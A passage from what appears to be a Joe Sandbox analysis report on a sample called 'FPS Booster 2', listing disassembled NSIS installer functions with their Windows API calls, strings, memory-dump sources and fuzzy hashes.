                                                • Associated: 00000007.00000002.2601284399.0000000000409000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.000000000040C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.0000000000420000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.0000000000424000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.000000000042C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.000000000046B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601570608.00000000005C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_400000_FPS Booster 2.jbxd
                                                Similarity
                                                • API ID: AddressProc$FreeGlobalLibrary$AllocCharLoadUpperVersionlstrlen
                                                • String ID: CreateToolhelp32Snapshot$EnumProcessModules$EnumProcesses$GetModuleBaseNameW$Kernel32.DLL$Module32FirstW$Module32NextW$PSAPI.DLL$Process32FirstW$Process32NextW$Unknown
                                                • API String ID: 20674999-2124804629
                                                • Opcode ID: e76717bc544e744264c82aeaea2435e5936e7e477e24acbe68bbbba6ce647f5a
                                                • Instruction ID: cf04814c2eceeca0522e3a2239a4cfb7588c45c97b625e8eb28f179f7b3afb0e
                                                • Opcode Fuzzy Hash: e76717bc544e744264c82aeaea2435e5936e7e477e24acbe68bbbba6ce647f5a
                                                • Instruction Fuzzy Hash: D3919371900219EBDF119FA4CD88AAEBBB8EF04705F11807AE906F7191DB788E51CF59
                                                Function 004040E4 Relevance: 40.5, APIs: 20, Strings: 3, Instructions: 210windowstringCOMMON
                                                Download Yara Rule
                                                APIs
                                                • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404199
                                                • GetDlgItem.USER32(?,000003E8), ref: 004041AD
                                                • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 004041CA
                                                • GetSysColor.USER32(?), ref: 004041DB
                                                • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004041E9
                                                • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004041F7
                                                • lstrlenW.KERNEL32(?), ref: 00404202
                                                • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 0040420F
                                                • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 0040421E
                                                  • Part of subcall function 00403FF6: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,?,00000000,00404150,?), ref: 0040400D
                                                  • Part of subcall function 00403FF6: GlobalAlloc.KERNEL32(00000040,00000001,?,?,?,00000000,00404150,?), ref: 0040401C
                                                  • Part of subcall function 00403FF6: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000001,00000000,00000000,?,?,00000000,00404150,?), ref: 00404030
                                                • GetDlgItem.USER32(?,0000040A), ref: 00404276
                                                • SendMessageW.USER32(00000000), ref: 0040427D
                                                • GetDlgItem.USER32(?,000003E8), ref: 004042AA
                                                • SendMessageW.USER32(00000000,0000044B,00000000,?), ref: 004042ED
                                                • LoadCursorW.USER32(00000000,00007F02), ref: 004042FB
                                                • SetCursor.USER32(00000000), ref: 004042FE
                                                • ShellExecuteW.SHELL32(0000070B,open,0046E220,00000000,00000000,00000001), ref: 00404313
                                                • LoadCursorW.USER32(00000000,00007F00), ref: 0040431F
                                                • SetCursor.USER32(00000000), ref: 00404322
                                                • SendMessageW.USER32(00000111,00000001,00000000), ref: 00404351
                                                • SendMessageW.USER32(00000010,00000000,00000000), ref: 00404363
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2601246566.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000007.00000002.2601211971.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601284399.0000000000409000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.000000000040C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.0000000000420000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.0000000000424000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.000000000042C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.000000000046B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601570608.00000000005C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_400000_FPS Booster 2.jbxd
                                                Similarity
                                                • API ID: MessageSend$Cursor$Item$ByteCharLoadMultiWide$AllocButtonCheckColorExecuteGlobalShelllstrlen
                                                • String ID: F$N$open
                                                • API String ID: 3928313111-1104729357
                                                • Opcode ID: 9e9e703d48f6c54e41068c493ebacbd9c251cecf858f8a13bd715780d6f12025
                                                • Instruction ID: b74f7aac3d4bcd21dc7a54326fe4aeb8052e912a1eb6d084c2fa05dc76f75ebb
                                                • Opcode Fuzzy Hash: 9e9e703d48f6c54e41068c493ebacbd9c251cecf858f8a13bd715780d6f12025
                                                • Instruction Fuzzy Hash: 5D71B5F1A00209BFDB109F65DD45EAA7B78FB44305F00853AFA05B62E1C778AD91CB99
                                                Function 6FFB10FB Relevance: 40.4, APIs: 20, Strings: 3, Instructions: 142memorystringCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GlobalAlloc.KERNEL32(00000040,00000800), ref: 6FFB1126
                                                • GlobalAlloc.KERNEL32(00000040,00000800), ref: 6FFB112D
                                                • GlobalAlloc.KERNEL32(00000040,00000800), ref: 6FFB1135
                                                • GlobalAlloc.KERNEL32(00000040,00000800), ref: 6FFB113D
                                                  • Part of subcall function 6FFB1E34: lstrcpynW.KERNEL32(?,?,6FFB1053,?,6FFB1053,?), ref: 6FFB1E62
                                                  • Part of subcall function 6FFB1E34: GlobalFree.KERNELBASE ref: 6FFB1E72
                                                • lstrcmpiW.KERNEL32(?,save,?,00000400,00000000,00000400,?,00000400), ref: 6FFB11A0
                                                • GetFileAttributesW.KERNEL32(00000000), ref: 6FFB11AC
                                                • lstrcpyW.KERNEL32(?,00000000), ref: 6FFB11BF
                                                • lstrcpyW.KERNEL32(?,All Files|*.*), ref: 6FFB11DC
                                                • CharNextW.USER32(?), ref: 6FFB11FB
                                                • GetCurrentDirectoryW.KERNEL32(00000004,?), ref: 6FFB1212
                                                • GetSaveFileNameW.COMDLG32(00000058), ref: 6FFB1220
                                                • GetOpenFileNameW.COMDLG32(00000058), ref: 6FFB1228
                                                • CommDlgExtendedError.COMDLG32 ref: 6FFB1235
                                                • GetSaveFileNameW.COMDLG32(00000058), ref: 6FFB124F
                                                • GetOpenFileNameW.COMDLG32(00000058), ref: 6FFB1257
                                                • SetCurrentDirectoryW.KERNEL32(?,6FFB30FC), ref: 6FFB126E
                                                • GlobalFree.KERNEL32(00000000), ref: 6FFB127B
                                                • GlobalFree.KERNEL32(?), ref: 6FFB127E
                                                • GlobalFree.KERNEL32(?), ref: 6FFB1283
                                                • GlobalFree.KERNEL32(?), ref: 6FFB1288
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2602569246.000000006FFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6FFB0000, based on PE: true
                                                • Associated: 00000007.00000002.2602537115.000000006FFB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.2602601497.000000006FFB3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.2602632211.000000006FFB6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_6ffb0000_FPS Booster 2.jbxd
                                                Similarity
                                                • API ID: Global$FileFree$AllocName$CurrentDirectoryOpenSavelstrcpy$AttributesCharCommErrorExtendedNextlstrcmpilstrcpyn
                                                • String ID: All Files|*.*$X$save
                                                • API String ID: 406688562-3147001704
                                                • Opcode ID: e92eea4bdcb840ce3a993b909062850bba8d6bd9f3578f395f098773941533ec
                                                • Instruction ID: 63c0449c1377bf51c13489ae6c84196cb582b0130166992f84d6da13fb507e9f
                                                • Opcode Fuzzy Hash: e92eea4bdcb840ce3a993b909062850bba8d6bd9f3578f395f098773941533ec
                                                • Instruction Fuzzy Hash: ED416A71D50618EBCF10AFB6CC8AB9E7FB8EF067A5F10401AE505E7290D774A950CBA0
                                                Function 00406AC5 Relevance: 35.2, APIs: 15, Strings: 5, Instructions: 163filestringmemoryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • lstrcpyW.KERNEL32(00465E20,NUL,?,00000000,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA,?,00000000,000000F1,?), ref: 00406AD5
                                                • CloseHandle.KERNEL32(00000000,000000F1,00000000,00000001,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA,?,00000000,000000F1,?), ref: 00406AF4
                                                • GetShortPathNameW.KERNEL32(000000F1,00465E20,00000400), ref: 00406AFD
                                                  • Part of subcall function 00405DE2: lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BFF,00000000,[Rename]), ref: 00405DF2
                                                  • Part of subcall function 00405DE2: lstrlenA.KERNEL32(?,?,00000000,00406BFF,00000000,[Rename]), ref: 00405E24
                                                • GetShortPathNameW.KERNEL32(000000F1,0046B478,00000400), ref: 00406B1E
                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00465E20,000000FF,00466620,00000400,00000000,00000000,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA), ref: 00406B47
                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,0046B478,000000FF,00466C70,00000400,00000000,00000000,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA), ref: 00406B5F
                                                • wsprintfA.USER32 ref: 00406B79
                                                • GetFileSize.KERNEL32(00000000,00000000,0046B478,C0000000,00000004,0046B478,?,?,00000000,000000F1,?), ref: 00406BB1
                                                • GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00406BC0
                                                • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00406BDC
                                                • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename]), ref: 00406C0C
                                                • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,00467070,00000000,-0000000A,0040A87C,00000000,[Rename]), ref: 00406C63
                                                  • Part of subcall function 00405E7C: GetFileAttributesW.KERNELBASE(00000003,004035F3,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 00405E80
                                                  • Part of subcall function 00405E7C: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A73,?), ref: 00405EA2
                                                • WriteFile.KERNEL32(?,00000000,?,?,00000000), ref: 00406C77
                                                • GlobalFree.KERNEL32(00000000), ref: 00406C7E
                                                • CloseHandle.KERNEL32(?), ref: 00406C88
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2601246566.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000007.00000002.2601211971.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601284399.0000000000409000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.000000000040C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.0000000000420000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.0000000000424000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.000000000042C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.000000000046B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601570608.00000000005C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_400000_FPS Booster 2.jbxd
                                                Similarity
                                                • API ID: File$ByteCharCloseGlobalHandleMulusermePathShortWidelstrcpylstrlen$AllocAttributesCreateFreePointerReadSizeWritewsprintf
                                                • String ID: ^F$%s=%s$NUL$[Rename]$plF
                                                • API String ID: 565278875-3368763019
                                                • Opcode ID: e221c2d90e8025947b1784e6655cd8b19626974249c22bbc52333144db3dc81c
                                                • Instruction ID: 187392fb1a539ff374a899d42f74550c270b9899c721d3c7d9f4fe98b52eb23c
                                                • Opcode Fuzzy Hash: e221c2d90e8025947b1784e6655cd8b19626974249c22bbc52333144db3dc81c
                                                • Instruction Fuzzy Hash: F2414B322082197FE7206B61DD4CE6F3E6CDF4A758B12013AF586F21D1D6399C10867E
                                                Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 127COMMON
                                                Download Yara Rule
                                                APIs
                                                • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                • BeginPaint.USER32(?,?), ref: 00401047
                                                • GetClientRect.USER32(?,?), ref: 0040105B
                                                • CreateBrushIndirect.GDI32(00000000), ref: 004010D8
                                                • FillRect.USER32(00000000,?,00000000), ref: 004010ED
                                                • DeleteObject.GDI32(?), ref: 004010F6
                                                • CreateFontIndirectW.GDI32(?), ref: 0040110E
                                                • SetBkMode.GDI32(00000000,00000001), ref: 0040112F
                                                • SetTextColor.GDI32(00000000,000000FF), ref: 00401139
                                                • SelectObject.GDI32(00000000,?), ref: 00401149
                                                • DrawTextW.USER32(00000000,00476AA0,000000FF,00000010,00000820), ref: 0040115F
                                                • SelectObject.GDI32(00000000,00000000), ref: 00401169
                                                • DeleteObject.GDI32(?), ref: 0040116E
                                                • EndPaint.USER32(?,?), ref: 00401177
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2601246566.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000007.00000002.2601211971.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601284399.0000000000409000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.000000000040C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.0000000000420000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.0000000000424000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.000000000042C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.000000000046B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601570608.00000000005C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_400000_FPS Booster 2.jbxd
                                                Similarity
                                                • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                • String ID: F
                                                • API String ID: 941294808-1304234792
                                                • Opcode ID: 2efc14ad74cb110e0ad817299842ebea0c3d587f520aff37d9c167bf14942bce
                                                • Instruction ID: 3a901b8e11bd10f40e8c3d59bf329074d7a31f92ad936af625f7db958ebfa50f
                                                • Opcode Fuzzy Hash: 2efc14ad74cb110e0ad817299842ebea0c3d587f520aff37d9c167bf14942bce
                                                • Instruction Fuzzy Hash: BF518772800209AFCF05CF95DD459AFBBB9FF45315F00802AF952AA1A1C738EA50DFA4
                                                Function 6FFB14FC Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 204windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • SendMessageW.USER32(?,?,?), ref: 6FFB1558
                                                • GetDlgItem.USER32(?,?), ref: 6FFB156B
                                                • GetWindowTextW.USER32(?,?,00000400), ref: 6FFB1693
                                                • DrawTextW.USER32(?,?,000000FF,?,00000414), ref: 6FFB16B4
                                                • GetWindowLongW.USER32(?,000000EB), ref: 6FFB16FF
                                                • SetTextColor.GDI32(?,00FF0000), ref: 6FFB1711
                                                • DrawTextW.USER32(?,?,000000FF,00000000,?), ref: 6FFB172B
                                                • DrawFocusRect.USER32(?,00000010), ref: 6FFB174C
                                                • RemovePropW.USER32(00000000,NSIS: nsControl pointer property), ref: 6FFB1770
                                                Strings
                                                • NSIS: nsControl pointer property, xrefs: 6FFB1768
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2602569246.000000006FFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6FFB0000, based on PE: true
                                                • Associated: 00000007.00000002.2602537115.000000006FFB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.2602601497.000000006FFB3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.2602632211.000000006FFB6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_6ffb0000_FPS Booster 2.jbxd
                                                Similarity
                                                • API ID: Text$Draw$Window$ColorFocusItemLongMessagePropRectRemoveSend
                                                • String ID: NSIS: nsControl pointer property
                                                • API String ID: 2331901045-1714965683
                                                • Opcode ID: 018ee019fbdae9bc7fa1d426565270d5fddf603659528e9043f031266639bac2
                                                • Instruction ID: 6a6dae0966c6c93ebabd9e399e0e5e2e188b22a33a755542c90030726c8f56c0
                                                • Opcode Fuzzy Hash: 018ee019fbdae9bc7fa1d426565270d5fddf603659528e9043f031266639bac2
                                                • Instruction Fuzzy Hash: F771DF715042099BDF11DF26CD84BAA7BF9FF02354F10456EE821DB2A6E730E891CB90
                                                Function 00402880 Relevance: 17.6, APIs: 4, Strings: 6, Instructions: 131registrystringCOMMON
                                                Download Yara Rule
                                                APIs
                                                • RegCreateKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004028DA
                                                • lstrlenW.KERNEL32(004140F8,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004028FD
                                                • RegSetValueExW.ADVAPI32(?,?,?,?,004140F8,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004029BC
                                                • RegCloseKey.ADVAPI32(?), ref: 004029E4
                                                  • Part of subcall function 004062CF: lstrlenW.KERNEL32(File: skipped: "C:\Users\user\AppData\Local\Temp\nss20C1.tmp\nsDialogs.dll" (overwriteflag=1),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                  • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                Strings
                                                • WriteRegBin: "%s\%s" "%s"="%s", xrefs: 004029A1
                                                • WriteRegExpandStr: "%s\%s" "%s"="%s", xrefs: 0040292A
                                                • WriteReg: error creating key "%s\%s", xrefs: 004029F5
                                                • WriteRegDWORD: "%s\%s" "%s"="0x%08x", xrefs: 00402959
                                                • WriteReg: error writing into "%s\%s" "%s", xrefs: 004029D4
                                                • WriteRegStr: "%s\%s" "%s"="%s", xrefs: 00402918
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2601246566.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000007.00000002.2601211971.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601284399.0000000000409000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.000000000040C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.0000000000420000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.0000000000424000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.000000000042C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.000000000046B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601570608.00000000005C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_400000_FPS Booster 2.jbxd
                                                Similarity
                                                • API ID: lstrlen$CloseCreateValuewvsprintf
                                                • String ID: WriteReg: error creating key "%s\%s"$WriteReg: error writing into "%s\%s" "%s"$WriteRegBin: "%s\%s" "%s"="%s"$WriteRegDWORD: "%s\%s" "%s"="0x%08x"$WriteRegExpandStr: "%s\%s" "%s"="%s"$WriteRegStr: "%s\%s" "%s"="%s"
                                                • API String ID: 1641139501-220328614
                                                • Opcode ID: d135351413aed0fa2e41fb55b591d9c8f09a23be57b10ac43573759c3ccf12cb
                                                • Instruction ID: c6ff7831871a22410ebf281ca69ba80d881ba5d3dc99c3f31bea2db7712f227d
                                                • Opcode Fuzzy Hash: d135351413aed0fa2e41fb55b591d9c8f09a23be57b10ac43573759c3ccf12cb
                                                • Instruction Fuzzy Hash: EE418BB2D00208BFCF11AF91CD46DEEBB7AEF44344F20807AF605761A2D3794A509B69
                                                Function 00406113 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 72filestringCOMMON
                                                Download Yara Rule
                                                APIs
                                                • CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,00406300,00000000), ref: 0040612A
                                                • GetFileAttributesW.KERNEL32(00476240,?,00000000,00000000,?,?,00406300,00000000), ref: 00406168
                                                • WriteFile.KERNEL32(00000000,000000FF,00000002,00000000,00000000,00476240,40000000,00000004), ref: 004061A1
                                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,00476240,40000000,00000004), ref: 004061AD
                                                • lstrcatW.KERNEL32(File: skipped: "C:\Users\user\AppData\Local\Temp\nss20C1.tmp\nsDialogs.dll" (overwriteflag=1),0040A678,?,00000000,00000000,?,?,00406300,00000000), ref: 004061C7
                                                • lstrlenW.KERNEL32(File: skipped: "C:\Users\user\AppData\Local\Temp\nss20C1.tmp\nsDialogs.dll" (overwriteflag=1),?,?,00406300,00000000), ref: 004061CE
                                                • WriteFile.KERNEL32(File: skipped: "C:\Users\user\AppData\Local\Temp\nss20C1.tmp\nsDialogs.dll" (overwriteflag=1),00000000,00406300,00000000,?,?,00406300,00000000), ref: 004061E3
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2601246566.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000007.00000002.2601211971.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601284399.0000000000409000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.000000000040C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.0000000000420000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.0000000000424000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.000000000042C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.000000000046B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601570608.00000000005C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_400000_FPS Booster 2.jbxd
                                                Similarity
                                                • API ID: File$Write$AttributesCloseHandlePointerlstrcatlstrlen
                                                • String ID: @bG$File: skipped: "C:\Users\user\AppData\Local\Temp\nss20C1.tmp\nsDialogs.dll" (overwriteflag=1)
                                                • API String ID: 3734993849-846574163
                                                • Opcode ID: 48839086a200bf93aa32383a4ca0414da094928b154be734d4a38c22442d7c90
                                                • Instruction ID: 195d9f7db6fc7c0c2d4377fc833027156c916e626c5a885f84869a8699de3d55
                                                • Opcode Fuzzy Hash: 48839086a200bf93aa32383a4ca0414da094928b154be734d4a38c22442d7c90
                                                • Instruction Fuzzy Hash: 0121C271500240EBD710ABA8DD88D9B3B6CEB06334B118336F52ABA1E1D7389D85C7AC
                                                Function 6E9E2445 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 106COMMON
                                                Download Yara Rule
                                                APIs
                                                • StringFromGUID2.OLE32(?,00000000,?,?,?,00000000,6E9E2B4A,00000000), ref: 6E9E2499
                                                  • Part of subcall function 6E9E164F: lstrcpyW.KERNEL32(00000018,00000000,?,6E9E11CD,-0000002E,00000000), ref: 6E9E1674
                                                • wsprintfW.USER32 ref: 6E9E24E8
                                                • GlobalFree.KERNEL32(?), ref: 6E9E2516
                                                • GlobalFree.KERNEL32(00000000), ref: 6E9E253F
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2602445757.000000006E9E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6E9E0000, based on PE: true
                                                • Associated: 00000007.00000002.2602410980.000000006E9E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                • Associated: 00000007.00000002.2602469964.000000006E9E3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                • Associated: 00000007.00000002.2602504176.000000006E9E5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_6e9e0000_FPS Booster 2.jbxd
                                                Similarity
                                                • API ID: FreeGlobal$FromStringlstrcpywsprintf
                                                • String ID: s<u
                                                • API String ID: 2435812281-779365171
                                                • Opcode ID: 2e8a9ebe229e9229e68d1d1ab1f35798dee3ef19f392d955b9e29f8085b23587
                                                • Instruction ID: 802ebaedd80d66d62a822bb9544ca37b1816b5a1bd501b74595cb882eb8f827b
                                                • Opcode Fuzzy Hash: 2e8a9ebe229e9229e68d1d1ab1f35798dee3ef19f392d955b9e29f8085b23587
                                                • Instruction Fuzzy Hash: 9931AEB1208607EFEB229BB8CD5886AB7BCFF463567110914EB1197A95FB31D844DF20
                                                Function 00402E55 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 103memoryfileCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,000000F0), ref: 00402EA9
                                                • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,?,000000F0), ref: 00402EC5
                                                • GlobalFree.KERNEL32(FFFFFD66), ref: 00402EFE
                                                • WriteFile.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,000000F0), ref: 00402F10
                                                • GlobalFree.KERNEL32(00000000), ref: 00402F17
                                                • CloseHandle.KERNEL32(?,?,?,?,?,000000F0), ref: 00402F2F
                                                • DeleteFileW.KERNEL32(?), ref: 00402F56
                                                Strings
                                                • created uninstaller: %d, "%s", xrefs: 00402F3B
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2601246566.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000007.00000002.2601211971.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601284399.0000000000409000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.000000000040C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.0000000000420000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.0000000000424000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.000000000042C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601321122.000000000046B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                • Associated: 00000007.00000002.2601570608.00000000005C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_400000_FPS Booster 2.jbxd
                                                Similarity
                                                • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                                                • String ID: created uninstaller: %d, "%s"
                                                • API String ID: 3294113728-3145124454
                                                • Opcode ID: 4ef21115088bf02e153ee67726e536285437d58c513b54df1b4c7782176e81a7
                                                • Instruction ID: bd1c3f70b2adfd396ae192ad3b35d3c6df9fc0ba6a3ee2c413e2f7d1cf6bca0f
                                                • Opcode Fuzzy Hash: 4ef21115088bf02e153ee67726e536285437d58c513b54df1b4c7782176e81a7
                                                • Instruction Fuzzy Hash: CF319E72800115ABDB11AFA9CD89DAF7FB9EF08364F10023AF515B61E1C7394E419B98
                                                Function 00403DF6 Relevance: 12.1, APIs: 8, Instructions: 60COMMON
                                                Download Yara Rule
                                                APIs
                                                • GetWindowLongW.USER32(?,000000EB), ref: 00403E10
                                                • GetSysColor.USER32(00000000), ref: 00403E2C
                                                • SetTextColor.GDI32(?,00000000), ref: 00403E38
                                                • SetBkMode.GDI32(?,?), ref: 00403E44
                                                • GetSysColor.USER32(?), ref: 00403E57
                                                • SetBkColor.GDI32(?,?), ref: 00403E67
                                                • DeleteObject.GDI32(?), ref: 00403E81
                                                • CreateBrushIndirect.GDI32(?), ref: 00403E8B
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2601246566.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000007.00000002.2601211971.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
